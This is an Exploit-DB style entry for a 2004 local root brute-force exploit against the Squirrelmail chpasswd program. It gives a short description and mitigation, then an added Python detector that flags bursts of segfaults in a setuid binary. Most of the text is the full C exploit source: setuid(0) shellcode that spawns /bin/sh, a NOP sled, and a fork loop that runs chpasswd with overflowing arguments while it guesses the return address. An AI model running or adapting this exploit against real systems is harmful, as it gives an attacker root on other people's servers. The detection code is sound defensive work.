Vendor: Squirrelmail
By: Bytes <Bytes[at]ph4nt0m.net>
CVSS: 9 (CRITICAL)
Type: Local Root Exploit
CWE: 119
Product Name: Squirrelmail
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Date: 2004

Squirrelmail chpasswd Local Root Bruteforce Exploit

This is a local root brute-force exploit for the Squirrelmail chpasswd program. It lets an attacker who already holds a local account gain root by exploiting a stack buffer overflow in the privileged chpasswd program: an oversized argument overwrites the saved return address on the stack, and the attacker's code then runs with root privileges. Because the exact return address is not known in advance, the exploit brute-forces it, re-running chpasswd with a slightly different guess on each iteration. The attacker must already have access to an account in the webmaster, www, or another webserver group.

Mitigation:

The vulnerability can be mitigated by patching the chpasswd program to prevent the buffer overflow. Access to accounts in the webmaster, www, or other webserver groups should also be restricted, since the exploit requires one of them.
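A return-address brute force like the one described above re-runs the privileged binary hundreds of times, and every wrong guess kills the child with a signal, which the kernel reports as a segfault in syslog. The following detector is an added example, not part of the original listing: it parses constructed kernel "segfault at" lines (host, PIDs and addresses are made up) and flags a watched setuid program that crashes repeatedly inside a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed syslog lines modelled on the Linux kernel "segfault at" message; PIDs/addresses are made up.
SAMPLE_LOG = """\
Aug 25 10:00:01 mail kernel: chpasswd[4101]: segfault at bffff7a0 ip bffff7a0 sp bffff680 error 7 in chpasswd[8048000+3000]
Aug 25 10:00:01 mail kernel: chpasswd[4102]: segfault at bffff7a2 ip bffff7a2 sp bffff680 error 7 in chpasswd[8048000+3000]
Aug 25 10:00:02 mail kernel: chpasswd[4103]: segfault at bffff7a4 ip bffff7a4 sp bffff680 error 7 in chpasswd[8048000+3000]
Aug 25 10:00:02 mail kernel: chpasswd[4104]: segfault at bffff7a6 ip bffff7a6 sp bffff680 error 7 in chpasswd[8048000+3000]
Aug 25 10:00:03 mail kernel: chpasswd[4105]: segfault at bffff7a8 ip bffff7a8 sp bffff680 error 7 in chpasswd[8048000+3000]
Aug 25 10:00:03 mail kernel: chpasswd[4106]: segfault at bffff7aa ip bffff7aa sp bffff680 error 7 in chpasswd[8048000+3000]
Aug 25 10:30:00 mail kernel: firefox[5120]: segfault at 0 ip 0805cd3a sp bfe0f0a0 error 4 in libxul.so[b6a00000+1800000]
"""

# Captures the syslog timestamp and the name of the crashing program.
SEGFAULT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: "
    r"(?P<comm>[^\[\s]+)\[\d+\]: segfault at [0-9a-f]+"
)

def parse_segfaults(log_text, year=2004):
    """Return (timestamp, program) per kernel segfault line; syslog omits the year."""
    events = []
    for line in log_text.splitlines():
        m = SEGFAULT_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["comm"]))
    return events

def detect_crash_burst(events, watched, threshold=5, window=timedelta(seconds=60)):
    """Flag each watched program with >= threshold crashes inside a sliding window.
    Returns [(program, peak_crashes_in_window, first_crash, last_crash)]."""
    per_prog = defaultdict(list)
    for ts, comm in events:
        if comm in watched:
            per_prog[comm].append(ts)
    alerts = []
    for comm, times in per_prog.items():
        times.sort()
        peak, start = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # drop crashes that fell out of the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append((comm, peak, times[0], times[-1]))
    return alerts

if __name__ == "__main__":
    for comm, n, first, last in detect_crash_burst(parse_segfaults(SAMPLE_LOG), {"chpasswd"}):
        print(f"ALERT: {n} crashes of {comm} between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

A single crash of an unrelated program (the firefox line) stays below the threshold, so only the burst from the watched setuid binary is reported.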

Exploit-DB raw data:

/*
** PST_chpasswd_exp-v_b.c:
**
** Squirrelmail chpasswd local root bruteforce exploit
** Author:
** Bytes<Bytes[at]ph4nt0m.net> || <Bytes[at]ph4nt0m.org>
** www ph4nt0m net
** Notice:
** v_b: Local bruteforce version
** v_R: remote bruteforce version
**
** Greatze: #ph4nt0m,#music@0x557
** All PST member,Grip2,Airsupply,Jambalaya,Ann,Paul,Happy...
** Thax: My GF(Luz),Oyxin,Winewind,Envymask,Eong,luoluo,GoGo(f0r ever)...
**
** -=-=-=-=-=-=-=-=-=-= !!![+PH4NT0M TEAM PRIVATE EXPLOIT+]!!! =-=-=-=-=-=-=-=-=-=-
**
** Date: 2004-04 # DO NOT DISTRIBUTE #
**
** You Must get account belong to Webmaster ,www or other webserver groups.
**
*/

#include <stdio.h>
#include <string.h>   /* strlen, memset, memcpy: missing from the original listing */
#include <unistd.h>
#include <stdlib.h>
#include <sys/wait.h>

#define NOP 0x90
#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */
#define LOOP 2000 /* loop of bruteforce */

/* setuid(0) shellcode by Matias Sedalo 3x ^_^ */

char shellcode[] = "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68"
                   "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

/* Returns the current stack pointer; relies on %eax being the return register (32-bit x86 only) */
unsigned long get_esp() {
    __asm__ ("movl %esp,%eax");
}

/* malloc wrapper that aborts the program when allocation fails */
void *M_malloc(size_t size){
    register void *value;
    value = malloc(size);
    if(value == NULL){
        printf("ERROR:virtual memory exhausted...\n");
        exit(-1);
    }
    return value;
}

int main(void){
    unsigned long ret_addr;
    int i,j=0,offset=2,status;
    char *buf1,*buf2;
    pid_t pid;

    /* initial return-address guess, taken relative to the current stack pointer */
    ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode);

    printf("\t-------------------------------------------------------\n");
    printf("\t Squirrelmail chpasswd local root bruteforce exploit \n");
    printf("\t code By Bytes<Bytes[at]ph4nt0m.org> 2004 \n");
    printf("\t http://www.ph4nt0m.net \n");
    printf("\t#######################################################\n");

    sleep(1);
    printf("[+] Bruteforce......\n\n");
    sleep(2);

    buf1 = (char *)M_malloc(150);   /* argv[1]: repeated return-address guess */
    buf2 = (char *)M_malloc(600);   /* argv[2]: NOP sled followed by the shellcode */

    /* each iteration forks a child that runs the target with the current guess;
       the parent then checks how the child ended */
    while(j <= LOOP){
        if((pid = fork()) == 0){
            memset(buf2,0x90,sizeof(buf2) - strlen(shellcode) - 8);
            memcpy(buf2 + sizeof(buf2) - strlen(shellcode) - 8,shellcode,sizeof(shellcode));
            for(i=0; i < 150; i+=4){
                *((unsigned long *)(buf1+i)) = ret_addr;
            }
            printf("buf1 = %s\n",buf1);
            execl(Fuckpr0,"chpasswd",buf1,buf2,0);
        }
        wait(&status);
        printf("[-] Signal: #%i\n", status);
        /* a normal exit means the child did not crash: stop here */
        if(WIFEXITED(status) != 0 ) {
            printf("[=] Step.%i: 0x%x\n[~] Exiting...\n",(j/2),ret_addr);
            exit(1);
        }else{
            /* child was killed by a signal: advance the guess and try again */
            ret_addr += offset;
            j += offset;
            printf("[=] Offset:%d Use ret:0x%x\n",j, ret_addr);
        }
    }

    free(buf1);
    free(buf2);
    return 1;
}

// milw0rm.com [2004-08-25]